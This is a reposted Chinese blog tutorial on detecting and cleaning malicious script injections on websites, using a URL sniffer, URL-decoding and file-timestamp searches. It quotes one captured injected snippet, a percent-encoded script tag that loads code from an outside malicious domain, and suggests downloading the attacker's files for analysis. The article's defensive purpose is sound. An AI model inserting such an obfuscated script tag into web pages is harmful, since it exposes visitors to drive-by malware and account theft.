网站挂马检测与清除

news/2024/5/8 21:27:40/文章来源:https://blog.csdn.net/weixin_33772645/article/details/89862550



网站挂马检测与清除

陈小兵
据不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
当一个网站运营很长时间后,网站文件会非常多,手工查看网页文件代码非常困难,杀毒软件仅仅对恶意代码进行查杀,对网页木马以及挂马程序不一定全部查杀,本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨,使用本文提及的工具可以很轻松的检测网站是否被挂马。
一、检测网页木马程序
1.安装urlsnooper 软件
Urlsnooper是一款URL嗅探工具,其官方主页地址为:[url]http://www.donationcoder.com/urlsnooper[/url],安装非常简单,按照提示进行安装即可。第一次使用时需要程序会自动检查网卡,查看能否正常连接网络,设置正确无误后,应该出现如图1所示的画面。
安装正确后的界面
注意:
如果未出现图1所示界面,说明程序设置存在问题,笔者在测试时使用发现该程序无法检测无线网卡,因此无法在无限网络中使用。
2.对网站进行侦测
Urlsnooper中的“Protocol Filter”中选择“Show All”,然后单击“Sniff Network”按钮开始监听网络。接着使用IE浏览器打开需要进行检测木马的网站,Urlsnooper会自动抓取网站中的所有连接,在Index中按照五位数字序号进行排列,如图2所示。
监听结果
说明:
在侦测结果中可能包含的连接地址非常多,这个时候就需要进行排查,可以选中每一个记录,Urlsnooper会在下方中显示详细的监听结果,如图2所示,就发现存在一段挂马代码:<script src=http://%61%76%65%31%2E%63%6E></script>
在百度搜索中对其进行搜索,如图3所示,有30多项搜索结果,从查询结果可以辅佐证明该段代码为挂马代码。
搜索结果
说明:要善于运用网络搜索引擎,通过搜索可以知道目前关于该问题的描述和解决方法等。
3.对地址进行解码
该地址采用了一种编码,我对常用的这种编码值进行了整理,如下表所示,从中可以找出该代码中的真实地址为[url]http://ave1.cn[/url]
编码对应表
原值
解码前的值
原值
解码前的值
原值
解码前的值
backspace
%08
I
%49
%75
tab
%09
J
%4A
%76
linefeed
%0A
K
%4B
w
%77
creturn
%0D
L
%4C
x
%78
space
%20
M
%4D
y
%79
!
%21
N
%4E
%7A
"
%22
O
%4F
{ 
%7B
#
%23
P
%50
%7C
$
%24
Q
%51
}
%7D
%
%25
R
%52
&
%26
S
%53
'
%27
T
%54
(
%28
U
%55
)
%29
V
%56
*
%2A
W
%57
+
%2B
X
%58
,
%2C
Y
%59
-
%2D
Z
%5A
.
%2E
[
%5B
/
%2F
\
%5C
0
%30
]
%5D
1
%31
^
%5E
2
%32
_
%5F
3
%33
`
%60
4
%34
a
%61
5
%35
b
%62
6
%36
c
%63
7
%37
d
%64
8
%38
e
%65
9
%39
f
%66
:
%3A
g
%67
;
%3B
h
%68
%3C
i
%69
=
%3D
j
%6A
%3E
k
%6B
?
%3F
l
%6C
@
%40
m
%6D
A
%41
n
%6E
B
%42
o
%6F
C
%43
p
%70
D
%44
q
%71
E
%45
r
%72
F
%46
s
%73
G
%47
t
%74
H
%48
u
%75
4.获取该网站相关内容
可以使用Flashget的资源管理器去获取该网站的内容,如图4所示,打开Flashget下载工具,单击“工具”-“站点资源探索器”,打开站点资源探索器,在地址中输入“[url]http://ave1.cn[/url]”,然后回车即可获取该网站的一些资源,在站点资源探索器中可以直接下载看见的文件,下载到本地进行查看。
使用“站点资源探索器”获取站点资源
说明:
使用“Flashget站点资源探索器”可以很方便的获取挂马者代码地址中的一些资源,这些资源可能是挂马的真实代码,透过这些代码可以知道挂马者是采用哪个漏洞,有时候还可以获取0day
在本例中由于时间较长,挂马者已经撤销了原来的挂马程序文件,在该网站中获取的html文件没有用处,且有些文件已经不存在了,无法对原代码文件进行分析。
二、清除网站中的恶意代码(挂马代码)
1.确定挂马文件
清除网站恶意代码首先需要知道哪些文件被挂马了,判断方法有三个,方法一就是通过直接查看代码,从中找出挂马代码;方法二是通过查看网站目录修改时间,通过时间进行判断;方法三使用本文提到的软件进行直接定位,通过监听找出恶意代码。在本案例中,网站首页是被确认挂马了,通过查看时间知道被挂马时间是825左右,因此可以通过使用资源管理器中的搜索功能,初步定位时间为82426日,搜索这个时间范围修改或者产生的文件,如图5,图6所示,搜索出来几十个这个时间段的文件。
搜索被修改文件
搜索结果
2.清除恶意代码
可以使用记事本打开代码文件从中清除恶意代码,在清除代码时一定要注意不要使用FrontPage的预览或者设计,否则会直接访问挂马网站,感染木马程序。建议使用记事本等文本编辑器。在清除恶意代码过程中,发现挂马者竟然对js文件也不放过,如图7所示。
js文件进行挂马
技巧:
可以使用Frontpage中的替换功能替换当前站点中的所有指定代码。
总结
本文操作简单,写起来比较复杂,关键在于使用urlsnooper软件定位挂马网页文件,然后就是对挂马代码(恶意代码)进行分析,最后是手工活,清除网站中的恶意代码。

 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/101784

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_795033.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

通过python统计nginx日志定位php网站响应慢的问题

# 公司网站反映很慢&#xff0c;可能是一些页面的访问方法或者页面引起&#xff0c;通过程序统计nginx访问日志的页面和具体的action方法访问次数以及平均响应时间可以为程序开发的同事提供参考定位具体的代码 # 默认的nginx日志 log_format main $remote_addr - $remote_user …

精心整理的前端开发必备网站推荐

本人是一个纯正的小白&#xff0c;在学习的过程中搜集了一些关于前端开发的网站&#xff0c;希望对大家能够有所帮助&#xff01;授人以鱼不如授人以渔&#xff01; 1.MDN开发者文档网址:https://developer.mozilla.org/zh-CN/ 2.CSS教程:https://www.schoolw3c.com/html-css/…

前端开发学习及工具网站

1、w3cschool(编程狮) 这个网站适合0基础学前端的同学&#xff0c;内容简单易懂&#xff0c;在闯关中进行学习&#xff0c;能够刺激你的学习欲望&#xff0c;可以在这里进行HTMLCSSJS以及一些前端框架的简单学习&#xff0c;闯关成功还能获得证书哦 2、freeCodeCamp 这个网站可…

个人精心整理的前端开发必备网站推荐

本人是一个纯正的小白&#xff0c;在学习的过程中搜集了一些关于前端开发的网站&#xff0c;希望对大家能够有所帮助&#xff01;授人以鱼不如授人以渔&#xff01; 1.MDN开发者文档网址:https://developer.mozilla.org/zh-CN/ 2.CSS教程:https://www.schoolw3c.com/html-css/…

2021学习前端常用网站,你用过吗

一&#xff0c;bilibili 什么&#xff0c;你认为这是一个看搞笑鬼畜&#xff0c;二次元网站&#xff1f;不不不&#xff0c;它也是一个超级棒的学习网站&#xff0c;首推&#xff01;&#xff01;最最重要的是它是免费的。 二&#xff0c;慕课网 程序员的梦工厂&#xff0c;这…

个人精心整理的前端开发必备网站推荐

本人是一个纯正的小白&#xff0c;在学习的过程中搜集了一些关于前端开发的网站&#xff0c;希望对大家能够有所帮助&#xff01;授人以鱼不如授人以渔&#xff01; 1.MDN开发者文档网址:https://developer.mozilla.org/zh-CN/ 2.CSS教程:https://www.schoolw3c.com/html-css/…

前端项目资源网站

1.CodePen&#xff1a;http://codepen.io/ 网站里有很多很酷的特效&#xff0c;而且可以看到效果的源代码&#xff0c;也可以看到实现效果&#xff0c;是一个非常不错的前端开发学习资源网站。这个是CodePen网站里的一个效果的源码截图&#xff0c;是不是很酷呀&#xff01; …

学前端的你,还在迷茫吗?快看看这些前端学习网站吧

1、博客园(http://www.cnblogs.com/) 博客园创立于2004年1月&#xff0c;是一个面向开发者的知识分享社区。自创建以来&#xff0c;博客园一直致力并专注于为开发者打造一个纯净的技术交流社区&#xff0c;推动并帮助开发者通过互联网分享知识&#xff0c;从而让更多开发者从中…

推荐 12 个学习前端必备的神仙级工具类项目与网站

前言 我是一个常年混迹在 GitHub 上的猫星人&#xff0c;所以发现了不少好的前端开源项目、常用技巧&#xff0c;在此分享给大家。 今天给大家推荐的是平时学习前端时&#xff0c;经常用到的一些辅助工具类网站。 网址描述unbug.github.io/codelf变量命名智能推荐&#xff08…

「颜值即正义」那些管UI的妹子要来的网站啦

今天小编要和大家分享一波硬核网站&#xff0c;作为一名前端工程师&#xff0c;不能总依靠UI小姐姐&#xff0c;工作上要为UI小姐姐能分担多少就分担多少&#xff0c;做事情不要设边界。生活上也是&#xff0c;多请她喝几杯奶茶&#xff0c;她也许就会告诉你下面这些网站。 0.…

前端10 个“哇塞”的 学习资源网站,收藏等于学会~

1. responsively responsively是干嘛吃的&#xff1f;一张图你就懂了&#xff1a; ​ 你可以在上面输入你的 web 网站&#xff0c;一次性查看它在各个设备下的响应式布局表现~ 并且支持自定义选择设备、导出为图片等&#xff1b;响应式布局&#xff0c;一个界面尽收眼底&…

还在为满意的渐变色发愁吗?10+个网站帮你解决烦恼

前言&#x1f384; 前端开发中&#xff0c;色彩的搭配非常重要&#xff0c;好的色彩设计会给网站增光添彩&#xff0c;让用户一看上去就感觉心情愉悦&#xff1b;坏的色彩~~~ 随着设计技术的进步&#xff0c;渐变颜色在色彩设计中越来越受欢迎&#xff0c;但想设计出满意的渐…

推荐 12 个学习前端必备的神仙级工具类项目与网站

1. codelf 有一种痛&#xff0c;不是程序员可能不懂&#xff0c;但如果是程序员一定懂&#xff0c;那就是给变量或函数命名。 随着项目越来越复杂&#xff0c;变量和函数数量越来越多&#xff0c;英语水平貌似也 hold 不住了。 虽然每个编程语言都有各种命名规范&#xff0c…

前端工程师必备九大网站

01 GitHub https://github.com/ 这个网站托管着很多优质的开源项目&#xff0c;像你可能听说过的 Linux&#xff0c;React&#xff0c;Vue&#xff0c;Webpack&#xff0c;JQuery等都在这个网站上开源。你可以轻松地获取源码并为相应的项目发送 pull request&#xff0c;然后…

比收费的还好用,7个自学python的网站

今天给大家分享几个自学python经常用到的网站&#xff0c;非常实用&#xff0c;建议收藏&#xff01; 0.Crossin的编程教室 python666.cn 首先当然要自我推荐一下我自己的python学习网站。内容面向python入门学习者&#xff0c;通俗易懂&#xff0c;零基础也可以学习。课程内容…

比收费的还好用,7个自学python的网站

很多同学在学习编程之初&#xff0c;都苦于不知道上哪里寻找学习资料。其实网上免费的教程就有很多&#xff0c;足够我们入门学习。 今天给大家分享几个自学python经常用到的网站&#xff0c;非常实用&#xff0c;建议收藏&#xff01; 0.Crossin的编程教室 python666.cn 首先…

贼适合初学者 这些练习 Python 的网站太好玩了

1. LeetCode LeetCode 是一个刷算法题的网站&#xff0c;里面有多种语言可选 &#xff0c;题目分为简单、中等和困难三个级别&#xff0c;可以根据自己的水平进行选择&#xff0c;想进大厂的话&#xff0c;这可能是必不可少的一关。 网址&#xff1a;https://leetcode-cn.com/…

中国铁路 12306 网站全新改版升级:支持扫码登录

百度智能云 云生态狂欢季 热门云产品1折起>>> 中国铁路官方宣布&#xff0c;全新改版升级的中国铁路 12306 网站将于11月3日&#xff08;即今天&#xff09;正式上线运营&#xff0c;网站客运服务功能更趋完善&#xff0c;旅客购票将更加方便快捷。▲全新改版升级的…

web学习网站

23、vxe-table v3 22、web前端开发视频教程资料&#xff0c;免费领&#xff01;-老汤博客 21、jQuery插件库-收集最全最新最好的jQuery插件 jquery插件库 20、ss免费账号 Alvin9999/new-pac Wiki GitHub 下载在客户端填充图一数据 19、 css样式查看网站 Can I use..…

【壹加壹SEO技术博客】SEO优化过程中排名下降的原因

【壹加壹SEO技术博客】SEO优化过程中排名下降的原因 1、网站上HTML标签的过度使用H1标签可以减少网站关键词排名的难度。但是很多网站管理员和朋友知道这种方法后&#xff0c;在自己的首页上无限制地添加H1标签&#xff0c;这不仅有不利于优化&#xff0c;还会导致网站过度优化…